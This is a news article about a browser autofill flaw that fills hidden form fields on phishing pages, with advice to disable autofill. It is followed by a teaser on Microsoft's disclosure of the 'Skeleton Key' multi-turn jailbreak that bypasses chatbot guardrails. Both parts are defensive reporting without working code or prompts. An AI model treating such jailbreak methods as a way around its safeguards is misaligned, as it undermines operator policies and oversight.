Skip to main content

Your browser might be filling in hidden fields and giving away your secrets

A hand on a laptop in a dark surrounding.
Image used with permission by copyright holder
It seems like you can’t go online lately without running into a new way to get infected with malware or have your identity stolen. And sometimes, it seems like there’s nothing you can do to avoid exposing yourself to trouble.

One of the more difficult traps to avoid is a phishing site, which presents itself as a legitimate page while requesting account and other sensitive information. Now, there’s apparently a browser vulnerability that can enter information on phishing sites without your knowledge and without your needing to do a thing, as ZDNet reports.

Basically, as security researcher Viljami Kuosmanen discovered, some browsers’ autofill functionality will fill out even hidden fields on sites. The Finnish hacker posted sample code on Github demonstrating how he could grab user information such as credit card numbers, expiration dates, and security codes with hidden fields automatically filled in when accessing a page using Google’s Chrome browser.

Various browsers are affected by the vulnerability, with Apple’s Safari and the Opera browser joining Chrome. Daniel Veditz, a Mozila security researcher, posted on Twitter that Firefox doesn’t suffer from the issue because only fields that users can actually click on can be autofilled by that browser.

At this point, there doesn’t appear to be any solution to the problem other than turning of autofill functionality in your chosen browser. For example, to turn off Autofill in Chrome, go to the menu, select Settings, then “Show advanced settings …,” the uncheck “Enable Autofill to fill out web forms in a single click.”

It’s up to browser developers to fix the bug for good, of course. In the meantime, if you decide to leave autofill turned on due to its general convenience factor, you’ll need to be even more diligent about making sure you’re only visiting known and trusted websites.

Mark Coppock
Mark has been a geek since MS-DOS gave way to Windows and the PalmPilot was a thing. He’s translated his love for…
A dangerous new jailbreak for AI chatbots was just discovered
the side of a Microsoft building

Microsoft has released more details about a troubling new generative AI jailbreak technique it has discovered, called "Skeleton Key." Using this prompt injection method, malicious users can effectively bypass a chatbot's safety guardrails, the security features that keeps ChatGPT from going full Taye.

Skeleton Key is an example of a prompt injection or prompt engineering attack. It's a multi-turn strategy designed to essentially convince an AI model to ignore its ingrained safety guardrails, "[causing] the system to violate its operators’ policies, make decisions unduly influenced by a user, or execute malicious instructions," Mark Russinovich, CTO of Microsoft Azure, wrote in the announcement.

Read more